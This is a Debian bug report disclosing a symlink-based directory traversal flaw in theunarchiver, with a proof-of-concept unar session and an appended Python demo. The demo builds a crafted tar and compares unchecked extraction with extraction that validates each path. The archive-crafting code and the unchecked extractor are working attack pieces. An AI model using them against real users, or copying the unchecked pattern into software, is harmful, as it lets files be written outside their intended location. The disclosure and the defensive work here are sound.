Package: theunarchiver
Version: 2.7.1-1
Severity: grave
Tags: security
Justification: user security hole
theunarchiver is affected by a directory traversal vulnerability. It can
be tricked by a specially crafted .tar file to unpack stuff into an
arbitrary directory.
Proof of concept:
$ ls -l /tmp/punt
/bin/ls: cannot access /tmp/punt: No such file or directory
$ pwd
/home/jwilk/traversal-test
$ unar traversal.tar.gz
Extracting traversal.tar.gz...
traversal.tar (?)...
root (link)... Failed! (Unknown error)
root (dir)... OK.
root/tmp (dir)... OK.
root/tmp/punt (0)... OK.
Failed! (Unknown error)
$ ls -l /tmp/punt
-rw-r--r-- 1 jwilk users 0 Sep 18 17:00 /tmp/punt
-- System Information:
Debian Release: wheezy/sid
APT prefers unstable
APT policy: (990, 'unstable'), (500, 'experimental')
Architecture: i386 (x86_64)
Kernel: Linux 3.0.0-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=C, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Versions of packages theunarchiver depends on:
ii gnustep-base-runtime 1.22.1-1
ii libbz2-1.0 1.0.5-7
ii libc6 2.13-21
ii libgcc1 1:4.6.1-11
ii libgnustep-base1.22 1.22.1-1
ii libicu44 4.4.2-2
ii libobjc3 4.6.1-11
ii libssl1.0.0 1.0.0e-2
ii libstdc++6 4.6.1-11
ii zlib1g 1:1.2.5.dfsg-1
--
Jakub Wilk
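The listing above shows the mechanism: the archive first delivers a symlink entry named "root", then directory and file entries whose paths pass through it, so an extractor that trusts the on-disk state writes "root/tmp/punt" wherever the link points. The following Python is an added example, not code from this report or from The Unarchiver: it builds an archive with the same member sequence as the listing and contrasts an extractor that writes members blindly with one that re-resolves every destination against the extraction directory before writing. The report does not show the link target; "/" is assumed for the original PoC (consistent with the file landing in /tmp/punt), and here the link is pointed at a scratch "outside" directory instead so the demo never touches the real /tmp.

```python
"""Symlink-based tar traversal: reproduce the member sequence from the bug
report and show a per-member destination check that defeats it.
Added example; archive layout mirrors the unar listing, link target is an
assumption (the report does not print it)."""
import io
import os
import tarfile
import tempfile


def build_crafted_tar(link_target):
    """Build, in memory, an archive shaped like the PoC listing: a symlink
    "root" -> link_target, directories "root" and "root/tmp", and an empty
    regular file "root/tmp/punt" whose path passes through the symlink."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        link = tarfile.TarInfo("root")
        link.type = tarfile.SYMTYPE
        link.linkname = link_target
        tar.addfile(link)
        for name in ("root", "root/tmp"):
            d = tarfile.TarInfo(name)
            d.type = tarfile.DIRTYPE
            d.mode = 0o755
            tar.addfile(d)
        f = tarfile.TarInfo("root/tmp/punt")  # size 0, like "punt (0)" above
        f.mode = 0o644
        tar.addfile(f, io.BytesIO(b""))
    return buf.getvalue()


def _inside(path, dest):
    """True if path, after following any symlinks that already exist on
    disk (including ones created by earlier archive members), is dest or
    lies beneath it."""
    real = os.path.realpath(path)
    return real == dest or real.startswith(dest + os.sep)


def _write_member(tar, m, path):
    """Minimal unchecked writer for the three member types used here."""
    if m.issym():
        os.symlink(m.linkname, path)
    elif m.isdir():
        os.makedirs(path, exist_ok=True)
    elif m.isfile():
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as out:
            out.write(tar.extractfile(m).read())


def extract(tar_bytes, dest, check=True):
    """Extract member by member. With check=True, refuse any member whose
    on-disk destination resolves outside dest, and refuse any symlink whose
    target (resolved relative to the link's own directory) does. Returns the
    refused member names in archive order."""
    dest = os.path.realpath(dest)
    refused = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        for m in tar:
            path = os.path.join(dest, m.name)
            ok = _inside(path, dest)
            if ok and m.issym():
                ok = _inside(os.path.join(os.path.dirname(path), m.linkname), dest)
            if check and not ok:
                refused.append(m.name)
                continue
            _write_member(tar, m, path)
    return refused


def demo():
    """Run both extractors in a scratch tree. Returns
    (escaped, refused, landed_inside): escaped is True if the unchecked
    extractor wrote punt outside its destination; refused is what the
    checked extractor rejected; landed_inside is True if the checked
    extractor still produced root/tmp/punt beneath its own destination."""
    with tempfile.TemporaryDirectory() as scratch:
        outside = os.path.join(scratch, "outside")  # stands in for "/" in the PoC
        os.mkdir(outside)
        tar_bytes = build_crafted_tar(outside)

        unchecked = os.path.join(scratch, "unchecked")
        os.mkdir(unchecked)
        extract(tar_bytes, unchecked, check=False)
        escaped = os.path.isfile(os.path.join(outside, "tmp", "punt"))

        checked = os.path.join(scratch, "checked")
        os.mkdir(checked)
        refused = extract(tar_bytes, checked, check=True)
        landed_inside = os.path.isfile(os.path.join(checked, "root", "tmp", "punt"))
    return escaped, refused, landed_inside


if __name__ == "__main__":
    print(demo())
```

The check has to run against the real filesystem state (os.path.realpath) at the moment each member is written, not against the archive's path strings: "root/tmp/punt" contains no "..", and only becomes an escape once the earlier symlink exists on disk. Rejecting the symlink up front (its target resolves outside the destination) is what lets the later "root" directory entry be created as an ordinary directory, so the file lands inside.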